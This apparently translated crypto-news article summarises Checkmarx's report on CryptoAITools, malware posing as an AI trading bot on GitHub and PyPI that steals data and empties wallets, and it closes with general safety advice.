Malware disguised as a Python-based trading bot reportedly targeted crypto investors in a multi-vector supply chain attack. We see that attackers are increasing their attacks with new methods day by day and as the volume in the cryptocurrency markets revives.
Attack Methods
Crypto traders have been targeted by advanced virus masquerading as artificial intelligence (AI)-based crypto trading software, according to a new blog post from cloud-based cybersecurity firm Checkmarx. Malware aims to steal sensitive data and empty crypto wallets.
Checkmarx stated that the malware was distributed via GitHub and PyPi (Python Package Directory). PyPi is a central platform for Python packages, and the malware targeted both Windows and Mac operating systems.
Technical Details of My Attack
The malware uses deceptive graphical user interfaces (GUIs) to confuse victims and follows a multi-stage infection process that redirects them to a fake website. Attackers prepare very complicated stories and attack processes to access investors’ information through an application disguised as a trading bot. “CryptoAITools malware implements a sophisticated multi-stage infection process using a fake website to lure victims into its secondary malware,” Checkmarx said.
“CryptoAITools malware includes graphical user interface (GUI) as a key component in its social engineering strategy. Once activated, the second-stage malware presents itself as an ‘AI Bot Starter’ application. “They follow such a gradual path to confuse users and collect sensitive information, but do not directly infect the virus.” – Checkmarx
The attacker also set up a Telegram channel pretending to be technical support for the product. It aimed to build trust by deceiving users with free trial offers.
“In the Telegram chat, the attacker uses various tactics to lure potential victims. They build credibility and reputation by offering ‘bot support’. To attract users, they promote the GitHub code repository as the ‘most powerful bot’ to appeal to those looking for advanced trading tools.” – Checkmarx
Checkmarx said the malware has “significant” consequences for its victims, including identity theft, browser data, sensitive computer files and theft of crypto assets.
As a result, the new method threatens the security of crypto investors and shows that caution is needed. It is important that users do not download software that is not from reliable sources and avoid suspicious links. It may also be beneficial to use up-to-date antivirus programs and take additional security measures such as two-factor authentication.
Disclaimer: The information contained in this article does not constitute investment advice. Investors should be aware that crypto currencies carry high volatility and therefore risk, and should carry out their transactions in line with their own research.
